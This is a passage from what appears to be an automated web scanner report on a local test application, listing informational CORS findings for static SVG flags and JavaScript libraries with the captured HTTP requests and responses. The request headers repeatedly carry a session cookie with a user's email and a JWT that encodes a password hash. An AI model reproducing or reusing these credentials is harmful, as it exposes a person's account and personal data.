    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"1f5-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 501
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <defs>
    <clipPath id="a">
    <path fill-opacity=".67" d="M-88.001 32h640v480h-640z"/>
    </clipPath>

    ...[SNIP]...
    15.40. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/lt.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/lt.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/lt.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"1dd-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 477
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd" transform="matrix(.64143 0 0 .96773 0 0)" stroke-width="1pt">
    <rect transform="matr
    ...[SNIP]...
    15.41. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/lv.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/lv.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/lv.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"fc-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 252
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd">
    <path fill="#fff" d="M0 0h640v480.003H0z"/>
    <path fill="#ab231d" d="M0 0h640v1
    ...[SNIP]...
    15.42. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/nl.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/nl.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/nl.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"175-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 373
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd" stroke-width="1pt" transform="scale(1.25 .9375)">
    <rect rx="0" ry="0" height="509.7
    ...[SNIP]...
    15.43. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/pl.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/pl.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/pl.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"e1-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 225
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd">
    <path fill="#fff" d="M640 480H0V0h640z"/>
    <path fill="#dc143c" d="M640 480H0V2
    ...[SNIP]...
    15.44. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/pt.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/pt.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/pt.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"2fb6-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 12214
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" height="480" width="640" viewBox="0 0 640 480">
    <path fill="red" d="M256 0h384v480H256z"/>
    <path fill="#060" d="M
    ...[SNIP]...
    15.45. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/ru.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/ru.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/ru.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"129-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 297
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd" stroke-width="1pt">
    <path fill="#fff" d="M0 0h640v480H0z"/>
    <path fill="#0039a6
    ...[SNIP]...
    15.46. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/se.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/se.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/se.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"2fd-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 765
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <defs>
    <clipPath id="a">
    <path fill-opacity=".67" d="M-53.421 0h682.67v512h-682.67z"/>
    </clipPat
    ...[SNIP]...
    15.47. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/tr.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/tr.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/tr.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"2b0-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 688
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd">
    <path fill="#f31930" d="M0 0h640v480H0z"/>
    <path d="M406.977 247.473c0 66.215-
    ...[SNIP]...
    15.48. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/us.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/us.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/us.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"1835-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 6197
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd" transform="scale(.9375)">
    <g stroke-width="1pt">
    <path d="M0 0h972.81v39.385H
    ...[SNIP]...
    15.49. http://192.168.61.143:3000/bower_components/jquery/dist/jquery.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/jquery/dist/jquery.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/jquery/dist/jquery.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Tue, 28 Apr 2015 16:03:04 GMT
    ETag: W/"1499c-14d00c472c0"
    Content-Type: application/javascript
    Content-Length: 84380
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*! jQuery v2.1.4 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */
    !function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a)
    ...[SNIP]...
    15.50. http://192.168.61.143:3000/bower_components/moment/min/moment.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/moment/min/moment.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/moment/min/moment.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sun, 04 Dec 2016 05:41:33 GMT
    ETag: W/"ef85-158c85a06c8"
    Content-Type: application/javascript
    Content-Length: 61317
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    //! moment.js
    //! version : 2.17.1
    //! authors : Tim Wood, Iskren Chernev, Moment.js contributors
    //! license : MIT
    //! momentjs.com
    !function(a,b){"object"==typeof exports&&"undefined"!=typeof module
    ...[SNIP]...
    15.51. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload-shim.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/ng-file-upload/ng-file-upload-shim.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/ng-file-upload/ng-file-upload-shim.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 05 Nov 2016 04:30:52 GMT
    ETag: W/"1c5e-15832c0e460"
    Content-Type: application/javascript
    Content-Length: 7262
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*! 12.2.13 */
    !function(){function a(a,b){window.XMLHttpRequest.prototype[a]=b(window.XMLHttpRequest.prototype[a])}function b(a,b,c){try{Object.defineProperty(a,b,{get:c})}catch(d){}}if(window.FileAP
    ...[SNIP]...
    15.52. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/ng-file-upload/ng-file-upload.min.js

    Issue detail

